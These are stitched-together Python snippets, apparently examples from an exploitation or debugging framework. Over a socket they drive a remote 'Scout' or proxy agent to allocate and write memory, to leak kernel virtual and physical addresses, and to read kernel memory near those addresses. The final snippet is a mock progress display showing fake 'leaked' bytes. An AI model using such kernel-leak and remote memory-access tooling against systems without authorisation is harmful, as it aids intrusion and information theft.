def startManage(sock_fd, logger): logger.info('Starting to manage the embedded Scout') logger.info('Allocating a remote memory buffer') data = sendInstr(sock_fd, instrAlloc(0x100), logger) memory_addr = struct.unpack("<L" if isBitness32() else "<Q", data)[0] logger.info('The buffer was allocated at address: 0x%012x', memory_addr) logger.info('Reading from the just allocated memory') data = sendInstr(sock_fd, instrMemRead(memory_addr, 0x100), logger) logger.info('The default content of the buffer is:') logger.addIndent() logger.info(hexDump(data)) logger.removeIndent() logger.info("Writing to the allocated memory") sendInstr(sock_fd, instrMemWrite(memory_addr + 0x70, b"Scout was here!"), logger) logger.info('Reading again from the same memory address') data = sendInstr(sock_fd, instrMemRead(memory_addr, 0x100), logger) logger.info('The updated content of the buffer is:') logger.addIndent() logger.info(hexDump(data)) logger.removeIndent()
def startManage(sock_fd, logger): logger.info('Starting to manage the proxy') logger.info('Sending the Leak instruction') data = sendInstr(sock_fd, instrLeakAddr(), logger) leaked_addr = struct.unpack("<Q", data)[0] logger.info("The leaked kernel address is: %016x" % (leaked_addr)) logger.info('Sending the memory read instruction') data = sendInstr(sock_fd, instrMemRead((leaked_addr - 0x1000) & (2 ** 64 - 1 - (0x1000 - 1)), 256), logger) logger.info("The leaked data is:") logger.addIndent() logger.info(hexDump(data)) logger.removeIndent()
def startManage(sock_fd, logger): logger.info('Starting to manage the proxy') logger.info('Sending the Leak instruction') data = sendInstr(sock_fd, instrLeakAddr(), logger) v_leaked_addr, p_leaked_addr = struct.unpack('<QQ', data) logger.info('The leaked kernel virtual address is: 0x%016x', v_leaked_addr) logger.info('The leaked kernel physical address is: 0x%016x', p_leaked_addr) logger.info('Sending the memory read instruction') data = sendInstr( sock_fd, instrPhyRead((p_leaked_addr - 0x1000) & (2**64 - 1 - (0x1000 - 1)), 256), logger) if data: logger.info('The leaked data is:') logger.addIndent() logger.info(hexDump(data)) logger.removeIndent()
time.sleep(0.1) s.finish() prompt.warning("The tool only supports 32 bit") prompt.info("Activating tool %s", TOOL_NAME) p = ProgressBar('Leaked %3d / %3d bytes - %3d%% Completed', 250, 30, True, time_format="Elapsed %M:%S -") p.start() p.advance(1) time.sleep(2) p.advance(50) time.sleep(1.5) p.advance(100) time.sleep(2) p.advance(1) time.sleep(0.5) p.advance(200) p.finish() prompt.debug("The leaked data is:") prompt.addIndent() prompt.debug(hexDump("".join(map(chr, range(250))))) prompt.removeIndent() prompt.removeIndent() prompt.info("Successful finish")